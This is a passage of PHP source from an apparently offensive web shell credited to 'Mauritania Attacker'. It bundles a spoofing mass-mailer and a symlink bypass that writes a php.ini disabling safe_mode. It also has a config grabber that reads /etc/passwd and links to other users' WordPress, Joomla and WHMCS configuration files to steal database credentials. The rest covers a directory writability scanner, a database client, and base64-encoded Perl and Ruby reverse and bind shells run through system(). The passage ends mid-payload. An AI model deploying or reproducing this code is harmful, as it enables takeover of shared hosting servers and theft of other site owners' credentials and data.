'; $testa = $_POST['veio']; if($testa != "") { $message = $_POST['html']; $subject = $_POST['assunto'].$_POST['assunto2']; $nome = $_POST['nome']; $de = $_POST['de']; $to = $_POST['emails']; $email = explode("\n", $to); $message = stripslashes($message); $i = 0; $count = 1; while($email[$i]) { $ok = "ok"; $headers = "MIME-Version: 1.0\n"; $headers .= "Content-Type: text/html; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Mailer: EDMAIL R6.00.02 Content-Length: 41061\n"; $headers .= "From: ".$email[$i]."\r\n"; if(mail($email[$i], $subject, $message, $headers)) echo "
| Numero : [$count] ".$email[$i].": Sent . . . *o*

"; else echo "
| Numero : [$count] ".$email[$i].": Error in Sending ? :(

"; $i++; $count++; } $count--; if($ok == "ok") echo ""; } echo'|| Priv8 M@iler ||'; echo'
'; } if(isset($_GET['action']) && $_GET['action'] == 'simby'){ echo '
Symlink Info - Cms Scanner - Perl based symlink - Symlink Manual - Manually Retrieve Config - Enable Symlink If Disabled - Python Bypass Forbidden Via TCP Protocol Symlink Bypass 2014
'; echo '
Symlink Bypass 2014 by Mauritania Attacker

'; $fp = fopen("php.ini","w+"); fwrite($fp,"safe_mode = OFF Safe_mode_gid = OFF disable_functions = NONE disable_classes = NONE open_basedir = OFF suhosin.executor.func.blacklist = NONE "); echo'






'; echo '
PHP VERSION: ';echo phpversion(); $fichier = $_POST['file']; $ghostfile = $_POST['ghostfile']; $symlink = $_POST['symlink']; if ($symlink) { $dir = "mauritania"; if(file_exists($dir)) { echo "
[+] mauritania Folder Already Exist _ are you Drunk XD !!!
\n"; } else { @mkdir($dir); { echo "
\!/ mauritania Folder Created ^_^ \!/
\n"; echo "
\!/ $ghostfile Retrieved Successfully ^_^ \!/
\n"; } } // Extract Priv8 htaccess File // $priv9 = "#Priv9 htaccess By Mauritania Attacker OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI DirectoryIndex $ghostfile ForceType text/plain AddType text/plain .php AddType text/plain .html AddType text/html .shtml AddType txt .php AddHandler server-parsed .php AddHandler txt .php AddHandler txt .html AddHandler txt .shtml Options All Options All"; $f =@fopen ('mauritania/.htaccess','w'); @fwrite($f , $priv9); @symlink("$fichier","mauritania/$ghostfile"); echo '
'.$ghostfile.''; } } if(isset($_GET['action']) && $_GET['action'] == 'cmd'){ echo '
MySQL & PostgreSql Connect - Command Execution - Base64 Command - Config Grabber - Subdomain Checker - Joomla Reverse Server - Wordpress Reverse Server - Find Directory Writable/Readable - Zone-h Notifier - Shtml Command Shell - Back connect Simple - Ruby BackConnect - Perl BackConnect - Python BackConnect - Exploit - Whcms Killer - Webmail Password Changer - Wordpress Csrf Exploit
'; echo '
Command Execution

'; echo '


'; } if(isset($_GET['action']) && $_GET['action'] == 'com64'){ echo '
MySQL & PostgreSql Connect - Command Execution - Base64 Command - Config Grabber - Subdomain Checker - Joomla Reverse Server - Wordpress Reverse Server - Find Directory Writable/Readable - Zone-h Notifier - Shtml Command Shell - Back connect Simple - Ruby BackConnect - Perl BackConnect - Python BackConnect - Exploit - Whcms Killer - Webmail Password Changer - Wordpress Csrf Exploit
'; echo '
Base64 Command

'; echo '
'; } if(isset($_GET['action']) && $_GET['action'] == 'vgrab'){ echo '
MySQL & PostgreSql Connect - Command Execution - Base64 Command - Config Grabber - Subdomain Checker - Joomla Reverse Server - Wordpress Reverse Server - Find Directory Writable/Readable - Zone-h Notifier - Shtml Command Shell - Back connect Simple - Ruby BackConnect - Perl BackConnect - Python BackConnect - Exploit - Whcms Killer - Webmail Password Changer - Wordpress Csrf Exploit
'; echo "
Config Grabber";?>

/etc/passwd content






Symlink is disabled :( ');}@mkdir('vwconfig', 0755);@chdir('vwconfig'); $htaccess=" OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI Options Indexes FollowSymLinks ForceType text/plain AddType text/plain .php AddType text/plain .html AddType text/html .shtml AddType txt .php AddHandler server-parsed .php AddHandler txt .php AddHandler txt .html AddHandler txt .shtml Options All Options All"; file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];$passwd=explode("\n",$passwd);echo "

wait ...

";foreach($passwd as $pwd){$pawd=explode(":",$pwd);$user =$pawd[0];@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');@symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');@symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');@symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');@symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');@symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');@symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');@symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt');@symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');@symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');@symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');@symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');@symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt');@symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');@symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt');@symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');@symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt');@symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');@symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');@symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');@symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');@symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');@symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');@symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');@symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');@symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');@symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');@symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');@symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');@symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');@symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');@symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');}echo 'Done -> Open configs';} } if(isset($_GET['action']) && $_GET['action'] == 'cari'){ echo '
MySQL & PostgreSql Connect - Command Execution - Base64 Command - Config Grabber - Subdomain Checker - Joomla Reverse Server - Wordpress Reverse Server - Find Directory Writable/Readable - Zone-h Notifier - Shtml Command Shell - Back connect Simple - Ruby BackConnect - Perl BackConnect - Python BackConnect - Exploit - Whcms Killer - Webmail Password Changer - Wordpress Csrf Exploit
'; echo '
Find Directory Writable/Readable


'.$end; function read_dir($path) { global $count; if ($handle = opendir($path)) { while (false !== ($file = readdir($handle))) { $dr="$path$file/"; if (($file!='.') and ($file!='..') and is_dir($dr)) { if (is_readable($dr) and is_writeable($dr)) { echo "[RW] " . $dr . "
\n\r"; $count++; } read_dir($dr); }}}} $count=0; set_time_limit(0); @$passwd=fopen('/etc/passwd','r'); if (!$passwd) { echo "
[-] No Access to /etc/passwd\n\r
"; exit;} $path_to_public=array(); echo "
| SUBJECT : OR
|LETTER :

| Reminder : Text HTML |
| MAILING LIST :

| Mail List |


'; if (empty($_POST['fak'])){ echo '

'; }else{ $b4se64 =$_POST['fak']; $heno =base64_encode($b4se64); echo '

'; echo ''; } echo '


'; if( !empty($_POST['coz']) ) if ($dec=='decode'){echo '
';} echo "

'; echo '
\n\r"; while(!feof($passwd)) { $str=fgets($passwd); $pos=strpos($str,":"); $username=substr($str,0,$pos); $dirz="/home/$username/public_html/"; if (($username!="")) { if (is_readable($dirz)) { array_push($path_to_public,$dirz); if (is_writeable($dirz)) { $count++; echo "[RW] " . $dirz . "


\n\r";} else echo "[R] " . $dirz . "
\n\r"; }}} echo "

[+] Found " . sizeof($path_to_public) . " readable public_html directories.

\n\r\n\r"; if (sizeof($path_to_public) != '0') { foreach ($path_to_public as $path) { } echo "[+] Found " . $count . " writable directories.\n\r"; echo "
"; } } if(isset($_GET['action']) && $_GET['action'] == 'mysqslsls'){ echo '
MySQL & PostgreSql Connect - Command Execution - Base64 Command - Config Grabber - Subdomain Checker - Joomla Reverse Server - Wordpress Reverse Server - Find Directory Writable/Readable - Zone-h Notifier - Shtml Command Shell - Back connect Simple - Ruby BackConnect - Perl BackConnect - Python BackConnect - Exploit - Whcms Killer - Webmail Password Changer - Wordpress Csrf Exploit
'; echo"
MySQL & PostgreSql Connect

TypeHostLoginPasswordDatabase
"; $tmp = ""; if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } $db->listDbs(); echo "'; } else echo $tmp; }else echo $tmp; echo " count the number of rows

"; if(isset($db) && $db->link){ echo "
"; if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']); echo ""; } echo "
Tables:

"; $tbls_res = $db->listTables(); while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if(!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); $value = htmlspecialchars($value); echo " ".$value."" . (empty($_POST['sql_count'])?' ':" ({$n['n']})") . "
"; } echo "
File path:
"; if(@$_POST['p1'] == 'select') { $_POST['p1'] = 'query'; $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); $num = $db->fetch(); $pages = ceil($num['n'] / 30); echo "".$_POST['p2']." ({$num['n']} records) Page # "; echo " of $pages"; if($_POST['p3'] > 1) echo " < Prev"; if($_POST['p3'] < $pages) echo " Next >"; $_POST['p3']--; if($_POST['type']=='pgsql') $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); else $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; echo "

"; } if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if($db->res !== false) { $title = false; echo ''; $line = 1; while($item = $db->fetch()) { if(!$title) { echo ''; foreach($item as $key => $value) echo ''; reset($item); $title=true; echo ''; $line = 2; } echo ''; $line = $line==1?2:1; foreach($item as $key => $value) { if($value == null) echo ''; else echo ''; } echo ''; } echo '
'.$key.'
null'.nl2br(htmlspecialchars($value)).'
'; } else { echo '
Error: '.htmlspecialchars($db->error()).'
'; } } echo "

"; echo "

"; if($_POST['type']=='mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if($db->fetch()) echo "
Load file
"; } if(@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '
'.htmlspecialchars($file['file']).'
'; } } else { echo htmlspecialchars($db->error()); } echo '
'; wsoFooter(); } if(isset($_GET['action']) && $_GET['action'] == 'beko'){ echo '
MySQL & PostgreSql Connect - Command Execution - Base64 Command - Config Grabber - Subdomain Checker - Joomla Reverse Server - Wordpress Reverse Server - Find Directory Writable/Readable - Zone-h Notifier - Shtml Command Shell - Back connect Simple - Ruby BackConnect - Perl BackConnect - Python BackConnect - Exploit - Whcms Killer - Webmail Password Changer - Wordpress Csrf Exploit
'; echo '
Back Connect

'; if ($_REQUEST['cdirname']){ if(mkdir($_REQUEST['cdirname'],"0777")){alert("Directory Created !");}else{alert("Permission Denied !");}} function bcn($ipbc,$pbc){ $bcperl="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3 NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRwb3J0ID0gJEFSR1Zb MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIHNjcmlw dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIlsrXSBDb25uZWN0aW5n IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyBZb3UgY2FuIGNo YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFN LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKaWYgKCFjb25uZWN0 KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGll KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOwog IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOwogIGV4 ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow=="; $opbc=fopen("bcc.pl","w"); fwrite($opbc,base64_decode($bcperl)); fclose($opbc); system("perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode"); } function wbp($wb){ $wbp="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3Rj cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsKc2V0c29j a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTsKYmlu ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxpc3RlbihTRVJWRVIs IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3Nl IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERPVVQsICI+JkNMSUVO VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV4ZScpOwpjbG9zZShT VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g"; $opwb=fopen("wbp.pl","w"); fwrite($opwb,base64_decode($wbp)); fclose($opwb); echo getcwd(); system("perl wbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode"); } function lbp($wb){ $lbp="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF07JHByb3RvPWdldHByb3Rv YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZFUiwgUEZfSU5FVCwg U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JF VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4oJHBvcnQsIElO QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7ICRwYWRkciA9IGFjY2Vw dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4mQ0xJRU5UIik7 b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTElFTlQiKTtzeXN0ZW0o Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVERFUlIpO30g"; $oplb=fopen("lbp.pl","w"); fwrite($oplb,base64_decode($lbp)); fclose($oplb); system("perl lbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode"); } if($_REQUEST['portbw']){ wbp($_REQUEST['portbw']); }if($_REQUEST['portbl']){ lbp($_REQUEST['portbl']); } if($_REQUEST['ipcb'] && $_REQUEST['portbc']){ bcn($_REQUEST['ipcb'],$_REQUEST['portbc']); } echo "


Ip : Port : ".$formp."


Windows Bind Port
Port : ".$formp."


Linux Bind Port
Port :

".$end;exit; } if(isset($_GET['action']) && $_GET['action'] == 'rubybckconnnect'){ echo '

MySQL & PostgreSql Connect - Command Execution - Base64 Command - Config Grabber - Subdomain Checker - Joomla Reverse Server - Wordpress Reverse Server - Find Directory Writable/Readable - Zone-h Notifier - Shtml Command Shell - Back connect Simple - Ruby BackConnect - Perl BackConnect - Python BackConnect - Exploit - Whcms Killer - Webmail Password Changer - Wordpress Csrf Exploit
'; mkdir('rubrub', 0755); chdir('rubrub'); $antinoooob = ".htaccess"; $morethannn = "$antinoooob"; $diamondd = fopen ($morethannn , 'w') or die ("diamondd açılamadı!"); $gloryr = " SecFilterEngine Off SecFilterScanPOST Off "; fwrite ( $diamondd , $gloryr ) ; fclose ($diamondd); //extract ruby reverse script $vkffhd = 'cmVxdWlyZSAnc29ja2V0Jw0KcmVxdWlyZSAncGF0aG5hbWUnDQogDQpkZWYgdXNhZ2UNCiAgICAgICAgcHJpbnQgImJpbmQgOlxyXG4gIHJ1YnkgIiArIEZpbGUuYmFzZW5hbWUoX19GSUxFX18pICsgIiBbcG9ydF1cclxuIg0KICAgICAgICBwcmludCAicmV2ZXJzZSA6XHJcbiAgcnVieSAiICsgRmlsZS5iYXNlbmFtZShfX0ZJTEVfXykgKyAiIFtwb3J0XSBbaG9zdF1cclxuIg0KZW5kDQogDQpkZWYgc3Vja3MNCiAgICAgICAgc3Vja3MgPSBmYWxzZQ0KICAgICAgICBpZiBSVUJZX1BMQVRGT1JNLmRvd25jYXNlLm1hdGNoKCdtc3dpbnx3aW58bWluZ3cnKQ0KICAgICAgICAgICAgICAgIHN1Y2tzID0gdHJ1ZQ0KICAgICAgICBlbmQNCiAgICAgICAgcmV0dXJuIHN1Y2tzDQplbmQNCiANCmRlZiByZWFscGF0aChzdHIpDQogICAgICAgIHJlYWwgPSBzdHINCiAgICAgICAgaWYgRmlsZS5leGlzdHM/KHN0cikNCiAgICAgICAgICAgICAgICBkID0gUGF0aG5hbWUubmV3KHN0cikNCiAgICAgICAgICAgICAgICByZWFsID0gZC5yZWFscGF0aC50b19zDQogICAgICAgIGVuZA0KICAgICAgICBpZiBzdWNrcw0KICAgICAgICAgICAgICAgIHJlYWwgPSByZWFsLmdzdWIoL1wvLywiXFwiKQ0KICAgICAgICBlbmQNCiAgICAgICAgcmV0dXJuIHJlYWwNCmVuZA0KIA0KaWYgQVJHVi5sZW5ndGggPT0gMQ0KICAgICAgICBpZiBBUkdWWzBdID1+IC9eWzAtOV17MSw1fSQvDQogICAgICAgICAgICAgICAgcG9ydCA9IEludGVnZXIoQVJHVlswXSkNCiAgICAgICAgZWxzZQ0KICAgICAgICAgICAgICAgIHVzYWdlDQogICAgICAgICAgICAgICAgcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCiAgICAgICAgICAgICAgICBleGl0DQogICAgICAgIGVuZA0KICAgICAgICBzZXJ2ZXIgPSBUQ1BTZXJ2ZXIubmV3KCIiLCBwb3J0KQ0KICAgICAgICBzID0gc2VydmVyLmFjY2VwdA0KICAgICAgICBwb3J0ID0gcy5wZWVyYWRkclsxXQ0KICAgICAgICBuYW1lID0gcy5wZWVyYWRkclsyXQ0KICAgICAgICBzLnByaW50ICIqKiogY29ubmVjdGVkXHJcbiINCiAgICAgICAgcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fVxyXG4iDQogICAgICAgIGJlZ2luDQogICAgICAgICAgICAgICAgaWYgbm90IHN1Y2tzDQogICAgICAgICAgICAgICAgICAgICAgICBmID0gcy50b19pDQogICAgICAgICAgICAgICAgICAgICAgICBleGVjIHNwcmludGYoIi9iaW4vc2ggLWkgXDxcJiVkIFw+XCYlZCAyXD5cJiVkIixmLGYsZikNCiAgICAgICAgICAgICAgICBlbHNlDQogICAgICAgICAgICAgICAgICAgICAgICBzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCiAgICAgICAgICAgICAgICAgICAgICAgIHdoaWxlIGxpbmUgPSBzLmdldHMNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcmFpc2UgZXJyb3JCcm8gaWYgbGluZSA9fiAvXmRpZVxyrbQvDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmIG5vdCBsaW5lLmNob21wID09ICIiDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgbGluZSA9fiAvY2QgLiovaQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGluZSA9IGxpbmUuZ3N1YigvY2QgL2ksICcnKS5jaG9tcA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgRmlsZS5kaXJlY3Rvcnk/KGxpbmUpDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxpbmUgPSByZWFscGF0aChsaW5lKQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEaXIuY2hkaXIobGluZSkNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVuZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWxzaWYgbGluZSA9fiAvXHc6LiovaQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgRmlsZS5kaXJlY3Rvcnk/KGxpbmUuY2hvbXApDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERpci5jaGRpcihsaW5lLmNob21wKQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZW5kDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlbHNlDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJTy5wb3BlbihsaW5lLCJyIil7fGlvfHMucHJpbnQgaW8ucmVhZCArICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiJ9DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZW5kDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVuZA0KICAgICAgICAgICAgICAgICAgICAgICAgZW5kDQogICAgICAgICAgICAgICAgZW5kDQogICAgICAgIHJlc2N1ZSBlcnJvckJybw0KICAgICAgICAgICAgICAgIHB1dHMgIioqKiAje25hbWV9OiN7cG9ydH0gZGlzY29ubmVjdGVkIg0KICAgICAgICBlbnN1cmUNCiAgICAgICAgICAgICAgICBzLmNsb3NlDQogICAgICAgICAgICAgICAgcyA9IG5pbA0KICAgICAgICBlbmQNCmVsc2lmIEFSR1YubGVuZ3RoID09IDINCiAgICAgICAgaWYgQVJHVlswXSA9fiAvXlswLTldezEsNX0kLw0KICAgICAgICAgICAgICAgIHBvcnQgPSBJbnRlZ2VyKEFSR1ZbMF0pDQogICAgICAgICAgICAgICAgaG9zdCA9IEFSR1ZbMV0NCiAgICAgICAgZWxzaWYgQVJHVlsxXSA9fiAvXlswLTldezEsNX0kLw0KICAgICAgICAgICAgICAgIHBvcnQgPSBJbnRlZ2VyKEFSR1ZbMV0pDQogICAgICAgICAgICAgICAgaG9zdCA9IEFSR1ZbMF0NCiAgICAgICAgZWxzZQ0KICAgICAgICAgICAgICAgIHVzYWdlDQogICAgICAgICAgICAgICAgcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCiAgICAgICAgICAgICAgICBleGl0DQogICAgICAgIGVuZA0KICAgICAgICBzID0gVENQU29ja2V0Lm5ldygiI3tob3N0fSIsIHBvcnQpDQogICAgICAgIHBvcnQgPSBzLnBlZXJhZGRyWzFdDQogICAgICAgIG5hbWUgPSBzLnBlZXJhZGRyWzJdDQogICAgICAgIHMucHJpbnQgIioqKiBjb25uZWN0ZWRcclxuIg0KICAgICAgICBwdXRzICIqKiogY29ubmVjdGVkIDogI3tuYW1lfToje3BvcnR9Ig0KICAgICAgICBiZWdpbg0KICAgICAgICAgICAgICAgIGlmIG5vdCBzdWNrcw0KICAgICAgICAgICAgICAgICAgICAgICAgZiA9IHMudG9faQ0KICAgICAgICAgICAgICAgICAgICAgICAgZXhlYyBzcHJpbnRmKCIvYmluL3NoIC1pIFw8XCYlZCBcPlwmJWQgMlw+XCYlZCIsIGYsIGYsIGYpDQogICAgICAgICAgICAgICAgZWxzZQ0KICAgICAgICAgICAgICAgICAgICAgICAgcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQogICAgICAgICAgICAgICAgICAgICAgICB3aGlsZSBsaW5lID0gcy5nZXRzDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJhaXNlIGVycm9yQnJvIGlmIGxpbmUgPX4gL15kaWVccj8kLw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiBub3QgbGluZS5jaG9tcCA9PSAiIg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmIGxpbmUgPX4gL2NkIC4qL2kNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxpbmUgPSBsaW5lLmdzdWIoL2NkIC9pLCAnJykuY2hvbXANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmIEZpbGUuZGlyZWN0b3J5rbhsaW5lKQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsaW5lID0gcmVhbHBhdGgobGluZSkNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRGlyLmNoZGlyKGxpbmUpDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlbmQNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHMucHJpbnQgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+Ig0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVsc2lmIGxpbmUgPX4gL1x3Oi4qL2kNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmIEZpbGUuZGlyZWN0b3J5rbhsaW5lLmNob21wKQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEaXIuY2hkaXIobGluZS5jaG9tcCkNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVuZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWxzZQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSU8ucG9wZW4obGluZSwiciIpe3xpb3xzLnByaW50IGlvLnJlYWQgKyA